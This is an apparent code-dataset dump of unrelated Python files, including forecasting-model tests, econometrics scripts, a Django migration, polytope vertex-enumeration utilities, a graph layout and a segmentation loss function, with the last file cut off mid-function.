id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
199697 | <filename>tests/orbit/models/test_ktrlite.py
import pytest
import numpy as np
import pandas as pd
from orbit.estimators.stan_estimator import StanEstimatorMAP
from orbit.models.ktrlite import KTRLiteMAP
from orbit.diagnostics.metrics import smape
SMAPE_TOLERANCE = 0.5
@pytest.mark.parametrize(
    "seasonality_fs_order", [None, [5]],
    ids=['default_order', 'manual_order']
)
def test_ktrlite_single_seas(make_daily_data, seasonality_fs_order):
    """Fit KTRLite (MAP) with a single yearly seasonality and sanity-check the forecast."""
    train_df, test_df, _ = make_daily_data
    model = KTRLiteMAP(
        response_col='response',
        date_col='date',
        seasonality=[365.25],
        seasonality_fs_order=seasonality_fs_order,
        estimator_type=StanEstimatorMAP
    )
    model.fit(train_df)
    forecast = model.predict(test_df)
    # One median plus 5%/95% percentile column per forecast date.
    wanted_columns = ['date', 'prediction_5', 'prediction', 'prediction_95']
    assert forecast.shape == (364, len(wanted_columns))
    assert forecast.columns.tolist() == wanted_columns
    # The MAP fit exposes exactly six posterior parameter arrays.
    assert len(model._posterior_samples) == 6
    assert smape(test_df['response'].values, forecast['prediction'].values) <= SMAPE_TOLERANCE
@pytest.mark.parametrize(
    "seasonality_fs_order", [None, [2, 5]],
    ids=['default_order', 'manual_order']
)
def test_ktrlite_dual_seas(make_daily_data, seasonality_fs_order):
    """Fit KTRLite (MAP) with weekly plus yearly seasonality and sanity-check the forecast."""
    train_df, test_df, _ = make_daily_data
    model = KTRLiteMAP(
        response_col='response',
        date_col='date',
        seasonality=[7, 365.25],
        seasonality_fs_order=seasonality_fs_order,
        estimator_type=StanEstimatorMAP
    )
    model.fit(train_df)
    forecast = model.predict(test_df)
    wanted_columns = ['date', 'prediction_5', 'prediction', 'prediction_95']
    assert forecast.shape == (364, len(wanted_columns))
    assert forecast.columns.tolist() == wanted_columns
    assert len(model._posterior_samples) == 6
    assert smape(test_df['response'].values, forecast['prediction'].values) <= SMAPE_TOLERANCE
@pytest.mark.parametrize("span_level", [.05, .1, .5])
def test_ktrlite_span_level(make_daily_data, span_level):
    """Check that span_level controls the number of level knots (~= 1/span_level)."""
    train_df, test_df, _ = make_daily_data
    model = KTRLiteMAP(
        response_col='response',
        date_col='date',
        seasonality=[7, 365.25],
        seasonality_fs_order=[2, 5],
        span_level=span_level,
        estimator_type=StanEstimatorMAP
    )
    model.fit(train_df)
    forecast = model.predict(test_df)
    wanted_columns = ['date', 'prediction_5', 'prediction', 'prediction_95']
    assert forecast.shape == (364, len(wanted_columns))
    assert forecast.columns.tolist() == wanted_columns
    assert len(model._posterior_samples) == 6
    assert smape(test_df['response'].values, forecast['prediction'].values) <= SMAPE_TOLERANCE
    # Knot count should follow the requested span; one level per observation.
    knots_df = model.get_level_knots()
    levels_df = model.get_levels()
    assert knots_df.shape[0] == round(1 / span_level)
    assert levels_df.shape[0] == model.num_of_observations
@pytest.mark.parametrize("level_knot_dates", [pd.date_range(start='2016-03-01', end='2019-01-01', freq='3M'),
                                              pd.date_range(start='2016-03-01', end='2019-01-01', freq='6M')])
def test_ktrlite_level_knot_dates(make_daily_data, level_knot_dates):
    """User-supplied level knot dates should be used verbatim by the fitted model."""
    train_df, test_df, _ = make_daily_data
    model = KTRLiteMAP(
        response_col='response',
        date_col='date',
        seasonality=[7, 365.25],
        seasonality_fs_order=[2, 5],
        level_knot_dates=level_knot_dates,
        estimator_type=StanEstimatorMAP
    )
    model.fit(train_df)
    forecast = model.predict(test_df)
    wanted_columns = ['date', 'prediction_5', 'prediction', 'prediction_95']
    assert forecast.shape == (364, len(wanted_columns))
    assert forecast.columns.tolist() == wanted_columns
    assert len(model._posterior_samples) == 6
    assert smape(test_df['response'].values, forecast['prediction'].values) <= SMAPE_TOLERANCE
    # The model must keep exactly the supplied knot dates, no more, no fewer.
    assert np.all(np.isin(model.level_knot_dates, level_knot_dates))
    assert len(model.level_knot_dates) == len(level_knot_dates)
@pytest.mark.parametrize("level_knot_length", [90, 120])
def test_ktrlite_level_knot_distance(make_daily_data, level_knot_length):
    """Fitting with an explicit level-knot spacing should still produce a valid forecast."""
    train_df, test_df, _ = make_daily_data
    model = KTRLiteMAP(
        response_col='response',
        date_col='date',
        seasonality=[7, 365.25],
        seasonality_fs_order=[2, 5],
        level_knot_length=level_knot_length,
        estimator_type=StanEstimatorMAP
    )
    model.fit(train_df)
    forecast = model.predict(test_df)
    wanted_columns = ['date', 'prediction_5', 'prediction', 'prediction_95']
    assert forecast.shape == (364, len(wanted_columns))
    assert forecast.columns.tolist() == wanted_columns
    assert len(model._posterior_samples) == 6
    assert smape(test_df['response'].values, forecast['prediction'].values) <= SMAPE_TOLERANCE
@pytest.mark.parametrize("coefficients_knot_length", [90, 120])
def test_ktrlite_coef_knot_distance(make_daily_data, coefficients_knot_length):
    """Fitting with an explicit coefficient-knot spacing should still produce a valid forecast."""
    train_df, test_df, _ = make_daily_data
    model = KTRLiteMAP(
        response_col='response',
        date_col='date',
        seasonality=[7, 365.25],
        seasonality_fs_order=[2, 5],
        coefficients_knot_length=coefficients_knot_length,
        estimator_type=StanEstimatorMAP
    )
    model.fit(train_df)
    forecast = model.predict(test_df)
    wanted_columns = ['date', 'prediction_5', 'prediction', 'prediction_95']
    assert forecast.shape == (364, len(wanted_columns))
    assert forecast.columns.tolist() == wanted_columns
    assert len(model._posterior_samples) == 6
    assert smape(test_df['response'].values, forecast['prediction'].values) <= SMAPE_TOLERANCE
def test_ktrlite_predict_decompose(make_daily_data):
    """decompose=True should add trend and per-seasonality columns with 5/95 bounds."""
    train_df, test_df, _ = make_daily_data
    model = KTRLiteMAP(
        response_col='response',
        date_col='date',
        seasonality=[7, 365.25],
        seasonality_fs_order=[2, 5],
        estimator_type=StanEstimatorMAP
    )
    model.fit(train_df)
    forecast = model.predict(test_df, decompose=True)
    wanted_columns = ['date', 'prediction_5', 'prediction', 'prediction_95',
                      'trend_5', 'trend', 'trend_95',
                      'seasonality_7_5', 'seasonality_7', 'seasonality_7_95',
                      'seasonality_365.25_5', 'seasonality_365.25', 'seasonality_365.25_95']
    assert forecast.shape == (364, len(wanted_columns))
    assert forecast.columns.tolist() == wanted_columns
    assert len(model._posterior_samples) == 6
    assert smape(test_df['response'].values, forecast['prediction'].values) <= SMAPE_TOLERANCE
def test_ktrlite_predict_decompose_point_estimate(make_daily_data):
    """With n_bootstrap_draws=-1 the decomposition is a point estimate: no percentile columns."""
    train_df, test_df, _ = make_daily_data
    model = KTRLiteMAP(
        response_col='response',
        date_col='date',
        seasonality=[7, 365.25],
        seasonality_fs_order=[2, 5],
        estimator_type=StanEstimatorMAP,
        n_bootstrap_draws=-1,
    )
    model.fit(train_df)
    forecast = model.predict(test_df, decompose=True)
    wanted_columns = ['date', 'prediction', 'trend', 'seasonality_7', 'seasonality_365.25']
    assert forecast.shape == (364, len(wanted_columns))
    assert forecast.columns.tolist() == wanted_columns
    assert len(model._posterior_samples) == 6
    assert smape(test_df['response'].values, forecast['prediction'].values) <= SMAPE_TOLERANCE
| StarcoderdataPython |
3304261 | <reponame>chrisconlon/DiversionReplication
"""
Goal: Run many Nevo cases, save results to a dict
to access these results later
"""
import pyblp
import numpy as np
import pandas as pd
import pathlib
# Resolve the project layout relative to this script's parent directory.
main_dir = pathlib.Path.cwd().parent
data_dir = main_dir / 'data'
dict_dir = data_dir / 'dict'
raw_dir = data_dir / 'raw'
# Keep pyblp output terse while running many estimation cases.
pyblp.options.digits = 2
pyblp.options.verbose = False
from aux_nevo_cases import get_nevo_base, get_nevo_nocons, get_nevo_noalpha, get_nevo_triple, get_nevo_logit, get_nevo_nested
from aux_blp_cases import get_blp_base, get_blp_nocons, get_blp_noalpha, get_blp_triple, get_blp_logit, get_blp_nested
# %%
# %%
# Base
# %%
# Run all Nevo specification variants (nested, logit, triple, no-constant,
# no-alpha, base). Comment this out if you want to skip re-estimation.
results_nevo_nested = get_nevo_nested()
results_nevo_logit = get_nevo_logit()
results_nevo_triple = get_nevo_triple()
results_nevo_nocons = get_nevo_nocons()
results_nevo_noalpha = get_nevo_noalpha()
results_nevo_base = get_nevo_base()
# %%
# Run the BLP specification variants. Comment this out after running it once
# (results are presumably cached by the aux_* helpers).
results_blp_nested = get_blp_nested()
results_blp_logit = get_blp_logit()
results_blp_triple = get_blp_triple()
results_blp_nocons = get_blp_nocons()
results_blp_noalpha = get_blp_noalpha()
results_blp_base = get_blp_base() | StarcoderdataPython |
82741 | '''
lab2
'''
#3.1: str.upper() returns an upper-cased copy; the original is unchanged
my_name = 'Tom'
print(my_name.upper())
#3.2: integers print directly
my_id = 123
print(my_id)
#3.3: chained assignment binds both names to the same value
#123=my_id  -- invalid: a literal cannot be an assignment target
my_id=your_id=123
print(my_id)
print(your_id)
#3.4: numeric-looking text stored as a string, not an int
my_id_str = '123'
print(my_id_str)
#3.5
#print(my_name=my_id)  -- invalid: print() has no keyword argument 'my_name'
#3.6: '+' concatenates two strings (works because both operands are str)
print(my_name+my_id_str)
#3.7: '*' repeats a string n times
print(my_name*3)
#3.8: split('.') breaks the sentence at each period, returning a list
print('hello, world. This is my first python string.'.split('.'))
#3.9: a single quote inside a double-quoted string needs no escaping
message = "Tom's id is 123"
print(message) | StarcoderdataPython |
3381038 | <reponame>bpneumann/django-raster
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration for the raster app.

    Follows 0009_rasterlayer_max_zoom; updates the help text of
    LegendEntry.expression and makes RasterLayer.rasterfile optional.
    """

    dependencies = [
        ('raster', '0009_rasterlayer_max_zoom'),
    ]

    operations = [
        migrations.AlterField(
            model_name='legendentry',
            name='expression',
            field=models.CharField(help_text=b'Use a number or a valid numpy logical expression where x is the pixel value. For instance: "(-3.0 < x) & (x <= 1)" or "x <= 1".', max_length=500),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='rasterlayer',
            name='rasterfile',
            field=models.FileField(null=True, upload_to=b'rasters', blank=True),
            preserve_default=True,
        ),
    ]
| StarcoderdataPython |
3289179 | <reponame>Okamille/mne-python<filename>conftest.py<gh_stars>0
# -*- coding: utf-8 -*-
# Author: <NAME> <<EMAIL>>
#
# License: BSD (3-clause)
import pytest
import warnings
# For some unknown reason, on Travis-xenial there are segfaults caused on
# the line pytest -> pdb.Pdb.__init__ -> "import readline". Forcing an
# import here seems to prevent them (!?). This suggests a potential problem
# with some other library stepping on memory where it shouldn't. It only
# seems to happen on the Linux runs that install Mayavi. Anectodally,
# @larsoner has had problems a couple of years ago where a mayavi import
# seemed to corrupt SciPy linalg function results (!), likely due to the
# associated VTK import, so this could be another manifestation of that.
import readline # noqa
@pytest.fixture(scope='session')
def matplotlib_config():
    """Configure matplotlib (and optional GUI toolkits) for viz tests.

    Session-scoped: forces the non-interactive 'agg' backend, resets params
    that could slow tests, and routes traits/mayavi to offscreen backends
    when those optional packages are importable.
    """
    import matplotlib
    matplotlib.use('agg')  # don't pop up windows
    import matplotlib.pyplot as plt
    assert plt.get_backend() == 'agg'
    # overwrite some params that can horribly slow down tests that
    # users might have changed locally (but should not otherwise affect
    # functionality)
    plt.ioff()
    plt.rcParams['figure.dpi'] = 100
    # Prefer the qt4 toolkit when traits is available; ignore if missing/broken.
    try:
        from traits.etsconfig.api import ETSConfig
    except Exception:
        pass
    else:
        ETSConfig.toolkit = 'qt4'
    # Use mayavi's offscreen 'test' backend when mayavi is importable.
    try:
        with warnings.catch_warnings(record=True):  # traits
            from mayavi import mlab
    except Exception:
        pass
    else:
        mlab.options.backend = 'test'
| StarcoderdataPython |
1684449 | <gh_stars>1-10
import math
import string
def change(s, j, c):
    """Return a copy of ``s`` whose character at index ``j`` is replaced by ``c``."""
    return ''.join((s[:j], c, s[j + 1:]))
def check(b, a, n, m):
    """Return 1 if every string in ``b`` differs from ``a`` in at most one
    position (Hamming distance <= 1), else 0.

    ``n`` and ``m`` (grid dimensions) are kept for interface compatibility;
    they are implied by ``b`` and ``a`` and no longer used directly.
    """
    for row in b:
        mismatches = 0
        for x, y in zip(row, a):
            if x != y:
                mismatches += 1
                if mismatches > 1:
                    # Early exit: this row already rules out the candidate.
                    return 0
    return 1
def solve():
    """Solve one test case.

    Reads ``n`` strings of length ``m`` and prints any string within
    Hamming distance 1 of every input string, or -1 if none exists.
    Only candidates one edit away from the first string are tried, since
    any valid answer must be within distance 1 of it.
    """
    n, m = map(int, input().split())
    grid = [input() for _ in range(n)]
    base = grid[0]
    for pos in range(m):
        for letter in string.ascii_lowercase:
            candidate = change(base, pos, letter)
            if check(grid, candidate, n, m):
                print(candidate)
                return
    print(-1)


if __name__ == '__main__':
    for _ in range(int(input())):
        solve()
| StarcoderdataPython |
4836156 | <filename>openerp/addons/l10n_in_hr_payroll/report/payslip_report.py
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2012-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import tools
from openerp.osv import fields, osv
class payslip_report(osv.osv):
    """Read-only payslip analysis model backed by a SQL view.

    Aggregates ``hr_payslip_line`` totals per payslip / salary-rule category /
    employee for reporting. ``_auto = False`` because the backing table is a
    view created by :meth:`init` rather than an ORM-managed table.
    """
    _name = "payslip.report"
    _description = "Payslip Analysis"
    _auto = False
    _columns = {
        'name':fields.char('Name', size=32, readonly=True),
        'date_from': fields.date('Date From', readonly=True,),
        'date_to': fields.date('Date To', readonly=True,),
        'year': fields.char('Year', size=4, readonly=True),
        'month': fields.selection([('01', 'January'), ('02', 'February'), ('03', 'March'), ('04', 'April'),
            ('05', 'May'), ('06', 'June'), ('07', 'July'), ('08', 'August'), ('09', 'September'),
            ('10', 'October'), ('11', 'November'), ('12', 'December')], 'Month', readonly=True),
        'day': fields.char('Day', size=128, readonly=True),
        'state': fields.selection([
            ('draft', 'Draft'),
            ('done', 'Done'),
            ('cancel', 'Rejected'),
        ], 'Status', readonly=True),
        'employee_id': fields.many2one('hr.employee', 'Employee', readonly=True),
        'nbr': fields.integer('# Payslip lines', readonly=True),
        'number': fields.char('Number', size=16, readonly=True),
        'struct_id': fields.many2one('hr.payroll.structure', 'Structure', readonly=True),
        'company_id':fields.many2one('res.company', 'Company', readonly=True),
        'paid': fields.boolean('Made Payment Order ? ', readonly=True),
        'total': fields.float('Total', readonly=True),
        'category_id':fields.many2one('hr.salary.rule.category', 'Category', readonly=True),
    }

    def init(self, cr):
        # (Re)create the backing SQL view on module initialization; totals are
        # summed per (payslip, line name, category, employee) group.
        tools.drop_view_if_exists(cr, 'payslip_report')
        cr.execute("""
            create or replace view payslip_report as (
                select
                    min(l.id) as id,
                    l.name,
                    p.struct_id,
                    p.state,
                    p.date_from,
                    p.date_to,
                    p.number,
                    p.company_id,
                    p.paid,
                    l.category_id,
                    l.employee_id,
                    sum(l.total) as total,
                    to_char(p.date_from, 'YYYY') as year,
                    to_char(p.date_from, 'MM') as month,
                    to_char(p.date_from, 'YYYY-MM-DD') as day,
                    to_char(p.date_to, 'YYYY') as to_year,
                    to_char(p.date_to, 'MM') as to_month,
                    to_char(p.date_to, 'YYYY-MM-DD') as to_day,
                    1 AS nbr
                from
                    hr_payslip as p
                    left join hr_payslip_line as l on (p.id=l.slip_id)
                where
                    l.employee_id IS NOT NULL
                group by
                    p.number,l.name,p.date_from,p.date_to,p.state,p.company_id,p.paid,
                    l.employee_id,p.struct_id,l.category_id
            )
        """)
payslip_report()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| StarcoderdataPython |
1740127 | <gh_stars>0
import warnings
import numpy as np
# Scipy
try:
from scipy.spatial import ConvexHull
except:
warnings.warn("You don't have scipy package installed. You may get error while using some feautures.")
# Pypolycontain
try:
import pypolycontain as pp
except:
warnings.warn("You don't have pypolycontain properly installed. Can not import objects")
# pycdd
try:
from cdd import Polyhedron,Matrix,RepType
except:
warnings.warn("WARNING: You don't have CDD package installed. Unable to visualize polytopes. You may still visualize zonotopes.")
# Pydrake
try:
import pydrake.solvers.mathematicalprogram as MP
import pydrake.solvers.gurobi as Gurobi_drake
import pydrake.solvers.osqp as OSQP_drake
# use Gurobi solver
global gurobi_solver,OSQP_solver, license
gurobi_solver=Gurobi_drake.GurobiSolver()
license = gurobi_solver.AcquireLicense()
OSQP_solver=OSQP_drake.OsqpSolver()
except:
warnings.warn("You don't have pydrake installed properly. Methods that rely on optimization may fail.")
try:
import pydrake.solvers.scs as scs_drake
scs_solver=scs_drake.ScsSolver()
except:
warnings.warn("You don't have pydrake with SCS solver.")
def to_AH_polytope(P):
    """
    Convert the polytopic object ``P`` into an AH-polytope.

    Supported inputs: ``AH_polytope``, ``H_polytope``, ``zonotope`` and
    ``V_polytope``. An equivalent new ``pp.AH_polytope`` is returned
    (the underlying numpy arrays are shared, not deep-copied).

    Raises:
        ValueError: if ``P`` is not one of the supported polytopic types.
    """
    kind = type(P).__name__
    if kind == "AH_polytope":
        return pp.AH_polytope(T=P.T, t=P.t, P=pp.H_polytope(P.P.H, P.P.h))
    elif kind == "H_polytope":
        n = P.H.shape[1]
        return pp.AH_polytope(T=np.eye(n), t=np.zeros((n, 1)), P=pp.H_polytope(P.H, P.h))
    elif kind == "zonotope":
        q = P.G.shape[1]
        return pp.AH_polytope(T=P.G, t=P.x.reshape(-1, 1), P=pp.unitbox(N=q).H_polytope, color=P.color)
    elif kind == "V_polytope":
        # Affine map from the (N-1)-simplex onto the convex hull of the vertices.
        V = P.list_of_vertices
        N = len(V)
        T = np.hstack([V[i] - V[-1] for i in range(N - 1)])
        t = V[-1]
        H = np.vstack((-np.eye(N - 1), np.ones((1, N - 1))))
        h = np.zeros((N, 1))
        h[N - 1, 0] = 1
        P = pp.H_polytope(H, h)
        return pp.AH_polytope(t, T, P)
    else:
        # BUG FIX: the original raised with ``P.type``, an attribute arbitrary
        # objects do not have, turning the intended ValueError into an
        # AttributeError.
        raise ValueError("object type not within my polytopic library: " + kind)
def H_to_V(P):
    r"""
    Returns the vertices of an H_polytope.

    Inputs:
        * P: H_polytope in :math:`\mathbb{R}^n`
    Output:
        * V: array of extreme points (one vertex per row), ordered along the convex hull.

    **Method**:
    The method is based on the double description method, using pycddlib.

    .. warning::
        This method can be very slow or numerically unstable for polytopes in high dimensions and/or with a large number of hyperplanes.
    """
    if type(P).__name__=="H_polytope":
        # cdd expects inequality rows of the form [h | -H] for H x <= h.
        p_mat=Matrix(np.hstack((P.h,-P.H)))
        p_mat.rep_type = RepType.INEQUALITY
        poly=Polyhedron(p_mat)
        y=np.array(poly.get_generators())
        x=y[:,1:]  # drop cdd's leading generator-type column
        # Keep only the extreme points, in convex-hull order.
        x=x[ConvexHull(x).vertices,:]
        return x
    else:
        raise ValueError(str(type(P).__name__)+" is not an H-polytope")
def AH_to_V(P,N=360,epsilon=1e-3,solver="Gurobi"):
    """
    Returns the V-polytope form of a 2D pp.AH_polytope.
    The method is based on ray shooting: one LP per ray direction.

    Inputs:
        * P: AH-polytope
        * N ``default=360``: number of rays
        * epsilon: half-width of the inflation square used when the ray hits
          form a degenerate (near-flat) hull
        * solver: ``default=Gurobi``. The linear-programming optimization solver.

    Returns:
        * V: matrix of hull vertices, one per row

    .. note::
        This method only works for 2D AH-polytopes and is meant for visualization.
        For generic use, first use H-V on :math:`\\mathbb{P}` and then apply the affine transformation.
        Note that H-V uses an elimination-based vertex enumeration method that is not scalable.
    """
    Q=pp.to_AH_polytope(P)
    if Q.n!=2:
        raise ValueError("Sorry, but I can only do AH to V operation in 2D using ray shooting")
    v=np.empty((N,2))
    # Build one LP: maximize support in direction c over the H-polytope
    # coordinates zeta; the cost vector is updated in-place per ray below.
    prog=MP.MathematicalProgram()
    zeta=prog.NewContinuousVariables(Q.P.H.shape[1],1,"zeta")
    prog.AddLinearConstraint(A=Q.P.H,ub=Q.P.h,lb=-np.inf*np.ones((Q.P.h.shape[0],1)),vars=zeta)
    theta=1
    c=np.array([np.cos(theta),np.sin(theta)]).reshape(2,1)
    c_T=np.dot(c.T,Q.T)
    # Nudge exactly-zero cost coefficients away from zero.
    c_T[c_T == 0] = 1e-3
    # get_nonzero_cost_vectors(c_T)
    a=prog.AddLinearCost(c_T.reshape(Q.P.n),np.zeros(1),zeta)
    if solver=="Gurobi":
        solver=gurobi_solver
    elif solver=="SCS":
        solver=scs_solver
    else:
        raise NotImplementedError
    for i in range(N):
        # NOTE(review): theta = i*N/2/np.pi does not sweep [0, 2*pi) evenly —
        # an even sweep would be i*2*np.pi/N. Confirm whether this was intended;
        # the ConvexHull step below masks ordering issues but not coverage gaps.
        theta=i*N/2/np.pi+0.01
        c=np.array([np.cos(theta),np.sin(theta)]).reshape(2,1)
        c_T=np.dot(c.T,Q.T)
        e=a.evaluator()
        cost = c_T.reshape(Q.P.H.shape[1])
        # cost[cost == 0] = 1e-3
        e.UpdateCoefficients(cost)
        result=solver.Solve(prog,None,None)
        assert result.is_success()
        zeta_n=result.GetSolution(zeta).reshape(zeta.shape)
        # Map the optimizer through the affine transformation (T, t).
        v[i,:]=(np.dot(Q.T,zeta_n)+Q.t).reshape(2)
    try:
        v=v[ConvexHull(v).vertices,:]
        return v
    except: # convexhull very small. Add some epsilon
        # Degenerate hull: inflate each ray hit into a tiny square of
        # half-width epsilon so ConvexHull can succeed.
        w=np.empty((4*N,2))
        for i in range(N):
            w[4*i,:]=v[i,:]+np.array([epsilon,epsilon])
            w[4*i+1,:]=v[i,:]+np.array([-epsilon,epsilon])
            w[4*i+2,:]=v[i,:]+np.array([-epsilon,-epsilon])
            w[4*i+3,:]=v[i,:]+np.array([epsilon,-epsilon])
        w=w[ConvexHull(w).vertices,:]
        return w
def zonotope_to_V(Z):
    """
    Finds the vertices of a zonotope.

    For up to 12 generators the candidates are computed exactly as
    x + G * {-1, 1}^q (all hypercube corners mapped through the generator
    matrix), reduced to the hull extremes; for more generators this falls
    back to ray shooting via the AH-polytope form.
    """
    q=Z.G.shape[1]
    if q<13:
        v=Z.x.T+np.dot(Z.G,vcube(q).T).T
        return v[ConvexHull(v).vertices,:]
    else:
        warnings.warn('Zonotope Vertex Enumeration: \
The number of generators %d is very large. \
Resorting to ray shooting'%q)
        return AH_to_V(pp.to_AH_polytope(Z))
def to_V(P, N=500):
    r"""
    Return the vertices of the polytopic object ``P``, vertically stacked
    (one vertex per row). ``N`` is the ray count used for AH-polytopes.
    """
    kind = type(P).__name__
    if kind == 'zonotope':
        return zonotope_to_V(P)
    if kind == 'AH_polytope':
        return AH_to_V(P, N=N)
    if kind == 'H_polytope':
        return H_to_V(P)
    if kind == 'hyperbox':
        return zonotope_to_V(P.zonotope)
    raise ValueError("Did not recognize the polytopic object" + str(kind))
def AH_to_H_old(Q,P0,solver="Gurobi"):
    r"""
    Converting Q to an H-polytope using an optimization-based method.

    WARNING: To be deprecated. This implementation appears unfinished/broken —
    see the NOTE(review) comments inline before relying on it.
    """
    P={}
    P[0]=P0
    if solver=="Gurobi":
        solver=gurobi_solver
    elif solver=="SCS":
        solver=scs_solver
    else:
        raise NotImplementedError
    def find_lambda(P):
        # NOTE(review): parameter ``P`` shadows the outer dict and is indexed
        # as P[0] below, yet the function is called with ``P0`` (a polytope,
        # not a dict) — confirm intent; this likely fails at runtime.
        # First solve for Lambda
        program=MP.MathematicalProgram()
        eps=program.NewContinuousVariables(1,"epsilon")
        Ball=pp.hyperbox(N=P.n).H_polytope
        Ball.h=Ball.h*eps
        P_plus_symbolic=pp.minkowski_sum(P[0],Ball)
        program.AddLinearCost(np.array([1]),np.array([0]),eps)
        pp.subset(program,Q,P_plus_symbolic,N=-1)
        Theta,Lambda,Gamma,Beta=pp.subset(program,P[0],Q)
        result=solver.Solve(program,None,None)
        if result.is_success():
            # NOTE(review): ``Getsolution`` is a typo — the drake API method is
            # ``GetSolution`` — so this branch raises AttributeError.
            Lambda_n=result.Getsolution(Lambda)
            eps_n=result.Getsolution(eps)
            print("epsilon is",eps_n)
        else:
            raise ValueError("Not feasible")
        return Lambda_n,eps_n
    Lambda,eps=find_lambda(P0)
Lambda,eps=find_lambda(P0)
#V=[np.random.random((2,1)) for i in range(10)]
#P=V_polytope(V)
#Q=to_pp.AH_polytope(P)
#
#B=unitbox(4)
#HB=B.H_polytope
#V=H_to_V(HB)
#Q=to_pp.AH_polytope(V_polytope(V))
#ver=AH_to_V(Q)
#G=np.random.random((2,5))
#x=np.random.random((2,1))
#Z=zonotope(x,G)
#V=zonotope_to_V(Z)
def vcube(n):
    r"""
    Vertices of the unit hypercube: a :math:`2^n \times n` array of
    :math:`\pm 1` vectors in :math:`\mathbb{R}^n`, in lexicographic order.
    """
    from itertools import product
    return np.array(list(product((-1, 1), repeat=n)))
3344031 | # -*- coding: utf-8 -*-
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
"""
Circular Layout
===============
This module contains several graph layouts which rely heavily on circles.
"""
import numpy as np
from ..util import _straight_line_vertices, issparse
def circular(adjacency_mat, directed=False):
    """Place all nodes evenly spaced on a single circle.

    Parameters
    ----------
    adjacency_mat : matrix or sparse
        The graph adjacency matrix
    directed : bool
        Whether the graph is directed. If this is True, this will also
        generate the vertices for arrows, which can be passed to an
        ArrowVisual.

    Yields
    ------
    (node_vertices, line_vertices, arrow_vertices) : tuple
        Yields the node and line vertices in a tuple. This layout only yields
        a single time, and has no builtin animation.
    """
    if issparse(adjacency_mat):
        adjacency_mat = adjacency_mat.tocoo()
    num_nodes = adjacency_mat.shape[0]
    angles = np.linspace(0, 2 * np.pi, num_nodes, endpoint=False)
    # The visual coordinate system spans [0, 1] on both axes, so use a
    # circle of radius 0.5 centred at (0.5, 0.5).
    node_coords = np.column_stack((np.cos(angles), np.sin(angles)))
    node_coords = (0.5 * node_coords + 0.5).astype(np.float32)
    line_vertices, arrows = _straight_line_vertices(adjacency_mat,
                                                    node_coords, directed)
    yield node_coords, line_vertices, arrows
| StarcoderdataPython |
1745364 | import random
import torch
import torch.nn as nn
from nntools.nnet import register_loss
class MultiLabelSoftBinaryCrossEntropy(nn.Module):
    """Binary cross-entropy for multi-label segmentation maps.

    Supports optional random label smoothing, per-class positive/negative
    frequency weighting, and an MCB variant that mines top-k hard negatives
    per class instead of plain frequency weighting.
    """

    def __init__(self, smooth_factor: float = 0, weighted: bool = True,
                 mcb: bool = False, hp_lambda: int = 10,
                 epsilon: float = 0.1, logits=True,
                 first_class_bg=False):
        # smooth_factor: upper bound of the random label-smoothing amount.
        # weighted: rebalance positive/negative pixels per class.
        # mcb: use top-k hard-negative mining instead of plain weighting.
        # hp_lambda: negatives-to-positives mining ratio (also the minimum k).
        # epsilon: numerical-stability constant used in the MCB normalizations.
        # logits: y_pred are raw logits (BCEWithLogits) vs probabilities (BCE).
        # first_class_bg: treat channel 0 as background and mine it differently.
        super(MultiLabelSoftBinaryCrossEntropy, self).__init__()
        self.smooth_factor = smooth_factor
        self.logits = logits
        # Per-pixel losses are needed for weighting/mining, hence reduction='none'.
        if logits:
            self.criterion = nn.BCEWithLogitsLoss(reduction='none' if weighted else 'mean')
        else:
            self.criterion = nn.BCELoss(reduction='none' if weighted else 'mean')
        self.weighted = weighted
        self.hp_lambda = hp_lambda
        self.MCB = mcb
        self.epsilon = epsilon
        self.first_class_bg = first_class_bg

    def forward(self, y_pred: torch.Tensor, y_true: torch.Tensor) -> torch.Tensor:
        if y_pred.size() != y_true.size():
            """
            Case in which y_pred.shape == b x c+1 x h x w and y_true.shape == b x c x h x w
            """
            y_pred = y_pred[:, 1:]  # We don't consider the first class (assuming it is background)
        b, c, h, w = y_true.shape
        y_true = y_true.float()
        if self.smooth_factor:
            # Random smoothing: pull the 0/1 targets towards the interior.
            smooth = random.uniform(0, self.smooth_factor)
            soft_targets = (1 - y_true) * smooth + y_true * (1 - smooth)
        else:
            soft_targets = y_true
        bce_loss = self.criterion(y_pred, soft_targets)
        if self.weighted and not self.MCB:
            # Frequency balancing: positives weighted by the negative-pixel
            # fraction (betas), negatives by the positive-pixel fraction.
            N = h * w
            weights = y_true.sum(dim=(2, 3), keepdim=True) / N
            betas = 1 - weights
            bce_loss = y_true * bce_loss * betas + (1 - y_true) * bce_loss * weights
            bce_loss = bce_loss.sum() / (b * N)
        if self.weighted and self.MCB:
            # Ypos[i]: number of positive pixels of class i across the batch.
            Ypos = y_true.sum(dim=(0, 2, 3), keepdim=False)
            mcb_loss = 0
            for i, k in enumerate(Ypos):
                if self.first_class_bg and i == 0:
                    # Background channel: mine a fixed number of hardest positives.
                    tmp = (y_true[:, i] * bce_loss[:, i]).flatten(1, 2)
                    mcb_loss += torch.topk(tmp, k=self.hp_lambda * 25, dim=1, sorted=False).values.mean()
                else:
                    # Mine the hardest negatives, up to hp_lambda per positive
                    # (averaged over the batch), but at least hp_lambda.
                    tmp = ((1 - y_true[:, i]) * bce_loss[:, i]).flatten(1, 2)
                    topk = max(min((k * self.hp_lambda) // b, (1 - y_true[:, i]).sum() // b), self.hp_lambda)
                    ik = torch.topk(tmp, k=int(topk), dim=1, sorted=False).values
                    # We can't compute a "k" per image on the batch, so we take an average value
                    # (limitation of the topk function)
                    beta_k = (ik.shape[1] / (k / b + ik.shape[1] + self.epsilon))
